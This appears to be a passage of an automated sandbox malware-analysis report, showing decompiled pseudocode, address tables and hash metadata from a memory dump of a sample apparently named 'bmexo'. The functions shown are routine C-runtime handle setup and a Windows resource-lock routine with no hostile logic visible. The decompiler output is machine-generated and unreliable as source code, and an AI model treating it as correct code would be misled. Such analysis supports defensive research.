                                          0x009e0cd3
                                          0x009e0cda
                                          0x009e0ce4
                                          0x009e0ce9
                                          0x00000000
                                          0x009e0cec
                                          0x009e0c8c
                                          0x00a0eb63
                                          0x00000000
                                          0x00000000
                                          0x00a0eb70
                                          0x00a0eb75
                                          0x00a0eb7d
                                          0x00000000
                                          0x00000000
                                          0x00a0eb8c
                                          0x00000000
                                          0x00a0eb8c
                                          0x009e0c96
                                          0x00000000
                                          0x00000000
                                          0x009e0ca2
                                          0x009e0cac
                                          0x009e0cb4
                                          0x00000000
                                          0x00000000
                                          0x009e0b44
                                          0x009e0b47
                                          0x009e0b49
                                          0x00000000
                                          0x00000000
                                          0x009e0b4f
                                          0x009e0b50
                                          0x00000000
                                          0x00000000
                                          0x009e0b56
                                          0x009e0b62
                                          0x009e0b7c
                                          0x009e0bac
                                          0x009e0a0f
                                          0x00a0eaaa
                                          0x00000000
                                          0x00a0eac4
                                          0x00a0eac4
                                          0x009e0bd0
                                          0x009e0bd0
                                          0x009e0bd4
                                          0x009e0bd9
                                          0x00000000
                                          0x00000000
                                          0x009e0bdb
                                          0x009e0be0
                                          0x00a0eb0e
                                          0x009e0a1a
                                          0x00000000
                                          0x009e0a1a
                                          0x00a0eb1a
                                          0x00a0eb1f
                                          0x00a0eb27
                                          0x00000000
                                          0x00000000
                                          0x00a0eb36
                                          0x00000000
                                          0x00a0eb36
                                          0x009e0bea
                                          0x00000000
                                          0x00000000
                                          0x009e0bf6
                                          0x009e0c00
                                          0x009e0c03
                                          0x009e0c0b
                                          0x00000000
                                          0x009e0c0b
                                          0x00a0eaaa
                                          0x00000000
                                          0x009e0a15
                                          0x009e0bb6
                                          0x00000000
                                          0x009e0bc6
                                          0x009e0bc6
                                          0x009e0bcb
                                          0x009e0c15
                                          0x00000000
                                          0x00000000
                                          0x009e0c1d
                                          0x009e0c20
                                          0x009e0c21
                                          0x009e0c24
                                          0x009e0c24
                                          0x009e0c26
                                          0x00000000
                                          0x009e0c26
                                          0x009e0bcd
                                          0x00000000
                                          0x009e0bcd
                                          0x009e0b89
                                          0x009e0b89
                                          0x009e0b90
                                          0x00000000
                                          0x00000000
                                          0x009e0b96
                                          0x00000000
                                          0x009e0b96
                                          0x009e0a04
                                          0x009e0a04
                                          0x009e0b9a
                                          0x009e0b9a
                                          0x009e0b9b
                                          0x009e0b9f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x009e0ba5
                                          0x009e0ac7
                                          0x009e0aca
                                          0x00a0eacf
                                          0x00000000
                                          0x00a0eade
                                          0x00a0eade
                                          0x00a0eae3
                                          0x00000000
                                          0x00000000
                                          0x00a0eaf3
                                          0x00a0eaf6
                                          0x00a0eaf7
                                          0x00a0eafe
                                          0x00a0eb01
                                          0x00000000
                                          0x00a0eb01
                                          0x00a0eacf
                                          0x009e0ad0
                                          0x009e0ad4
                                          0x00000000
                                          0x00000000
                                          0x009e0ada
                                          0x009e0ae6
                                          0x009e0c34
                                          0x00000000
                                          0x009e0c47
                                          0x009e0c49
                                          0x009e0c4a
                                          0x009e0c4e
                                          0x009e0c51
                                          0x009e0c54
                                          0x009e0c57
                                          0x009e0c5a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x009e0c60
                                          0x009e0afb
                                          0x009e0afe
                                          0x009e0b02
                                          0x009e0b05
                                          0x009e0b08
                                          0x00000000
                                          0x009e0b08
                                          0x009e0ae6
                                          0x009e0b44
                                          0x009e09f8
                                          0x009e09f8
                                          0x009e09f9
                                          0x00000000
                                          0x00000000
                                          0x00a0eaa0
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: 58f9573f75302e6261b89caa9e68bcf2e6105aaa909f6d7929a76180cba6a043
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: F1A1BF71D0038ADBCF26CF56C8447BEB7B8BB95704F24896AD482A7281D7B49EC1CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F238A8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E00F238A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				void** _t105;
				void** _t106;
				void** _t109;
				signed char _t111;
				long _t119;
				void* _t129;
				signed int* _t133;
				void* _t135;
				signed int* _t138;
				void** _t139;
				void* _t141;
				signed int _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xf32260);
				E00F22400(__ebx, __edi, __esi);
				E00F2442F(0xb);
				 *(_t155 - 4) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E00F24869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xf34848 = _t82;
					 *0xf350e4 = _t141;
					while(_t133 <  &(_t82[0x200])) {
						_t133[1] = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						_t133[2] = 0;
						_t133[9] = _t133[9] & 0x00000080;
						_t133[9] = _t133[9] & 0x0000007f;
						_t133[9] = 0xa0a;
						_t133[0xe] = 0;
						_t133[0xd] = 0;
						_t133 =  &(_t133[0x10]);
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xf34848; // 0x0
					}
					GetStartupInfoW(_t155 - 0x74);
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							if(_t142 >= 3) {
								break;
							}
							_t147 =  *0xf34848 + (_t142 << 6);
							 *(_t155 - 0x24) = _t147;
							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
								_t147[1] = 0x81;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								if(_t91 == 0xffffffff || _t91 == 0) {
									L45:
									_t147[1] = _t147[1] | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xf36100;
									if(_t94 != 0) {
										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
									}
									goto L47;
								} else {
									_t98 = GetFileType(_t91);
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									if(_t99 != 2) {
										if(_t99 != 3) {
											L44:
											_t71 =  &(_t147[3]); // -15943740
											E00F240A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											_t147[2] = _t147[2] + 1;
											goto L47;
										}
										_t103 = _t147[1] | 0x00000008;
										L43:
										_t147[1] = _t103;
										goto L44;
									}
									_t103 = _t147[1] | 0x00000040;
									goto L43;
								}
							} else {
								_t147[1] = _t147[1] | 0x00000080;
								L47:
								_t142 = _t142 + 1;
								continue;
							}
						}
						 *(_t155 - 4) = _t129;
						E00F23B53();
						_t86 = 0;
						L49:
						return E00F22445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 =  &(_t105[1]);
					 *(_t155 - 0x28) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					 *(_t155 - 0x30) = 1;
					while( *0xf350e4 < _t135) {
						_t138 = E00F24869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						if(_t138 != 0) {
							0xf34848[_t149] = _t138;
							 *0xf350e4 =  *0xf350e4 + _t141;
							while(_t138 <  &(0xf34848[_t149][0x200])) {
								_t138[1] = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								_t138[2] = 0;
								_t138[9] = _t138[9] & 0x00000080;
								_t138[9] = 0xa0a;
								_t138[0xe] = 0;
								_t138[0xd] = 0;
								_t138 =  &(_t138[0x10]);
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xf350e4;
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *(_t155 - 0x28);
					_t139 =  *(_t155 - 0x20);
					while(_t143 < _t135) {
						_t150 =  *_t139;
						if(_t150 == 0xffffffff || _t150 == _t129) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  &(( *(_t155 - 0x28))[0]);
							 *(_t155 - 0x28) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						} else {
							_t111 =  *_t109;
							if((_t111 & 0x00000001) == 0) {
								goto L22;
							}
							if((_t111 & 0x00000008) != 0) {
								L20:
								_t154 = 0xf34848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								_t154[1] =  *( *(_t155 - 0x28));
								_t37 =  &(_t154[3]); // 0xd
								E00F240A2(_t37, 0xfa0, 0);
								_t156 = _t156 + 0xc;
								_t154[2] = _t154[2] + 1;
								_t139 =  *(_t155 - 0x20);
								L21:
								_t135 =  *(_t155 - 0x1c);
								goto L22;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							if(_t119 == 0) {
								goto L21;
							}
							goto L20;
						}
					}
					goto L28;
				}
				_t86 = E00F22600(_t155, 0xf33400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                                          0x00f238a8
                                          0x00f238aa
                                          0x00f238af
                                          0x00f238b6
                                          0x00f238be
                                          0x00f238c1
                                          0x00f238c5
                                          0x00f238c6
                                          0x00f238c7
                                          0x00f238ce
                                          0x00f238d0
                                          0x00f238d5
                                          0x00f238f2
                                          0x00f238f7
                                          0x00f238fd
                                          0x00f23906
                                          0x00f2390c
                                          0x00f2390f
                                          0x00f23912
                                          0x00f2391b
                                          0x00f2391e
                                          0x00f23924
                                          0x00f23927
                                          0x00f2392a
                                          0x00f2392d
                                          0x00f23930
                                          0x00f23930
                                          0x00f2393b
                                          0x00f23946
                                          0x00f23a7b
                                          0x00f23a7d
                                          0x00f23a7e
                                          0x00f23a7e
                                          0x00f23a80
                                          0x00f23a80
                                          0x00f23a86
                                          0x00000000
                                          0x00000000
                                          0x00f23a91
                                          0x00f23a97
                                          0x00f23a9d
                                          0x00f23ab1
                                          0x00f23ab7
                                          0x00f23abe
                                          0x00f23ac3
                                          0x00f23ac5
                                          0x00f23ab9
                                          0x00f23abb
                                          0x00f23abb
                                          0x00f23ac9
                                          0x00f23acf
                                          0x00f23ad5
                                          0x00f23b23
                                          0x00f23b29
                                          0x00f23b2c
                                          0x00f23b2e
                                          0x00f23b35
                                          0x00f23b3a
                                          0x00f23b3a
                                          0x00000000
                                          0x00f23adb
                                          0x00f23adc
                                          0x00f23ae4
                                          0x00000000
                                          0x00000000
                                          0x00f23ae9
                                          0x00f23aeb
                                          0x00f23af3
                                          0x00f23b00
                                          0x00f23b0b
                                          0x00f23b12
                                          0x00f23b16
                                          0x00f23b1b
                                          0x00f23b1e
                                          0x00000000
                                          0x00f23b1e
                                          0x00f23b06
                                          0x00f23b08
                                          0x00f23b08
                                          0x00000000
                                          0x00f23b08
                                          0x00f23af9
                                          0x00000000
                                          0x00f23af9
                                          0x00f23aa3
                                          0x00f23aa9
                                          0x00f23b3d
                                          0x00f23b3d
                                          0x00000000
                                          0x00f23b3d
                                          0x00f23a9d
                                          0x00f23b43
                                          0x00f23b46
                                          0x00f23b4b
                                          0x00f23b4d
                                          0x00f23b52
                                          0x00f23b52
                                          0x00f2394c
                                          0x00f23951
                                          0x00000000
                                          0x00000000
                                          0x00f23957
                                          0x00f23959
                                          0x00f2395c
                                          0x00f2395f
                                          0x00f23964
                                          0x00f2396e
                                          0x00f23970
                                          0x00f23972
                                          0x00f23972
                                          0x00f23977
                                          0x00f23978
                                          0x00f2397b
                                          0x00f2398d
                                          0x00f2398f
                                          0x00f23994
                                          0x00f23a2e
                                          0x00f23a35
                                          0x00f23a3b
                                          0x00f23a4b
                                          0x00f23a51
                                          0x00f23a54
                                          0x00f23a57
                                          0x00f23a5b
                                          0x00f23a61
                                          0x00f23a64
                                          0x00f23a67
                                          0x00f23a6a
                                          0x00f23a6a
                                          0x00f23a6f
                                          0x00f23a70
                                          0x00f23a73
                                          0x00000000
                                          0x00f23a73
                                          0x00f2399a
                                          0x00f239a0
                                          0x00000000
                                          0x00f239a0
                                          0x00f239a3
                                          0x00f239a5
                                          0x00f239aa
                                          0x00f239ab
                                          0x00f239ae
                                          0x00f239b1
                                          0x00f239b9
                                          0x00f239be
                                          0x00f23a1b
                                          0x00f23a1b
                                          0x00f23a1c
                                          0x00f23a22
                                          0x00f23a23
                                          0x00f23a26
                                          0x00f23a29
                                          0x00000000
                                          0x00f239c4
                                          0x00f239c4
                                          0x00f239c8
                                          0x00000000
                                          0x00000000
                                          0x00f239cc
                                          0x00f239dc
                                          0x00f239e9
                                          0x00f239f0
                                          0x00f239f5
                                          0x00f239fc
                                          0x00f23a06
                                          0x00f23a0a
                                          0x00f23a0f
                                          0x00f23a12
                                          0x00f23a15
                                          0x00f23a18
                                          0x00f23a18
                                          0x00000000
                                          0x00f23a18
                                          0x00f239cf
                                          0x00f239d5
                                          0x00f239da
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f239da
                                          0x00f239be
                                          0x00000000
                                          0x00f239b1
                                          0x00f238ea
                                          0x00000000

                                          APIs
                                          • __lock.LIBCMT ref: 00F238B6
                                            • Part of subcall function 00F2442F: __mtinitlocknum.LIBCMT ref: 00F24441
                                            • Part of subcall function 00F2442F: EnterCriticalSection.KERNEL32(00000000,?,00F237AB,0000000D), ref: 00F2445A
                                          • __calloc_crt.LIBCMT ref: 00F238C7
                                            • Part of subcall function 00F24869: __calloc_impl.LIBCMT ref: 00F24878
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F238E2
                                          • GetStartupInfoW.KERNEL32(?,00F32260,00000064,00F21654,00F32190,00000014), ref: 00F2393B
                                          • __calloc_crt.LIBCMT ref: 00F23986
                                          • GetFileType.KERNEL32 ref: 00F239CF
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2772871689-0
                                          • Opcode ID: f9df9586100333055fbc5648f6e36e04d5aa3fcaae10efe38433ebe85814fd2c
                                          • Instruction ID: dd4e4a338abbaec1797c91964a1c9e8e708664458bfbc02cccb88bade7aa4ab6
                                          • Opcode Fuzzy Hash: f9df9586100333055fbc5648f6e36e04d5aa3fcaae10efe38433ebe85814fd2c
                                          • Instruction Fuzzy Hash: 4881E5B1D052658FCB14CF68E8416A9BBF0AF45320B24426ED4A6AB3D1C73CE943EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009E0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E009E0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a801c0;
									_push(_t144);
									_push(0);
									_t51 = E0099F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L009E4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L009F3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L009F3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00A2217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L009F3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E009E3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a801c0;
												_push(_t138);
												_push(0);
												_t58 = E0099F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L009E4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L009F3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L009F3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00A2217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L009F3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E009E3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E009C5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0099F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E009E3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0099F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E009E3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0099F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E009E3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E009C5329(_t110, _t138);
																_t69 = E009C53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                          0x009e055a
                                          0x009e055d
                                          0x009e0563
                                          0x009e0566
                                          0x009e05d8
                                          0x009e05e2
                                          0x009e05e5
                                          0x00000000
                                          0x009e05e7
                                          0x009e05e7
                                          0x009e05ea
                                          0x009e05f3
                                          0x009e05f3
                                          0x009e0568
                                          0x009e0568
                                          0x009e0568
                                          0x009e0569
                                          0x009e0569
                                          0x009e0569
                                          0x009e056b
                                          0x00000000
                                          0x00000000
                                          0x00a0217f
                                          0x00a02183
                                          0x00a0225b
                                          0x00a0225f
                                          0x00a02189
                                          0x00a0218c
                                          0x00a0218f
                                          0x00a02194
                                          0x00a02199
                                          0x00a0219d
                                          0x00a021a0
                                          0x00a021a2
                                          0x00a021ce
                                          0x00a021ce
                                          0x00a021ce
                                          0x00a021d0
                                          0x00a021d6
                                          0x00a021de
                                          0x00a021e2
                                          0x00a021e8
                                          0x00a021e9
                                          0x00a021ec
                                          0x00a021f1
                                          0x00a021f6
                                          0x00000000
                                          0x00000000
                                          0x00a021f8
                                          0x00a021fb
                                          0x00a02206
                                          0x00a0220b
                                          0x00a0220c
                                          0x00a02217
                                          0x00a02226
                                          0x00a0222b
                                          0x00a0222c
                                          0x00a0222f
                                          0x00a02232
                                          0x00a02235
                                          0x00a02235
                                          0x00a0223a
                                          0x00a0223f
                                          0x00a02241
                                          0x00a02243
                                          0x00a02248
                                          0x00a02248
                                          0x00a0224d
                                          0x00a0224f
                                          0x00a02262
                                          0x00a02263
                                          0x00a02268
                                          0x00a02269
                                          0x00a02269
                                          0x00a02269
                                          0x00a0226d
                                          0x00000000
                                          0x00000000
                                          0x00a02276
                                          0x00a02279
                                          0x00a0227e
                                          0x00a02283
                                          0x00a02287
                                          0x00a0228a
                                          0x00a0228d
                                          0x00a0228f
                                          0x00a022bc
                                          0x00a022bc
                                          0x00a022bc
                                          0x00a022be
                                          0x00a022c4
                                          0x00a022cc
                                          0x00a022d0
                                          0x00a022d6
                                          0x00a022d7
                                          0x00a022da
                                          0x00a022df
                                          0x00a022e4
                                          0x00000000
                                          0x00000000
                                          0x00a022e6
                                          0x00a022e9
                                          0x00a022f4
                                          0x00a022f9
                                          0x00a022fa
                                          0x00a02305
                                          0x00a02314
                                          0x00a02319
                                          0x00a0231a
                                          0x00a0231d
                                          0x00a02320
                                          0x00a02323
                                          0x00a02323
                                          0x00a02328
                                          0x00a0232d
                                          0x00a0232f
                                          0x00a02331
                                          0x00a02336
                                          0x00a02336
                                          0x00a0233b
                                          0x00a0233d
                                          0x00a02350
                                          0x00a02351
                                          0x00a02356
                                          0x00a02359
                                          0x00a02359
                                          0x00a0235b
                                          0x00a0235d
                                          0x009c5367
                                          0x009c536b
                                          0x009c5372
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00a02363
                                          0x00a02363
                                          0x00a02369
                                          0x00a0236a
                                          0x00a0236c
                                          0x00a02371
                                          0x00a02373
                                          0x00000000
                                          0x00a02379
                                          0x00a02379
                                          0x00a0237a
                                          0x00a0237f
                                          0x00a0237f
                                          0x00a02385
                                          0x00a02386
                                          0x00a02389
                                          0x00a0238e
                                          0x00a02390
                                          0x009c5378
                                          0x009c537c
                                          0x00a02396
                                          0x00a02396
                                          0x00a02397
                                          0x00a0239c
                                          0x00a023a2
                                          0x00a023a3
                                          0x00a023a6
                                          0x00a023ab
                                          0x00a023ad
                                          0x00000000
                                          0x00a023b3
                                          0x00a023b3
                                          0x00a023b4
                                          0x00a023b9
                                          0x00a023ba
                                          0x00a023ba
                                          0x00a023bc
                                          0x00a023bf
                                          0x00000000
                                          0x00000000
                                          0x009f9153
                                          0x009f9158
                                          0x009f915a
                                          0x009f915e
                                          0x009f9160
                                          0x00000000
                                          0x009f9166
                                          0x009f9166
                                          0x009f9171
                                          0x009f9176
                                          0x009f9176
                                          0x00000000
                                          0x009f9160
                                          0x00a023c6
                                          0x00a023ce
                                          0x00a023d7
                                          0x00a023d7
                                          0x00a023ad
                                          0x00a02390
                                          0x00a02373
                                          0x00a0233f
                                          0x00a0233f
                                          0x00000000
                                          0x00a0233f
                                          0x00a02291
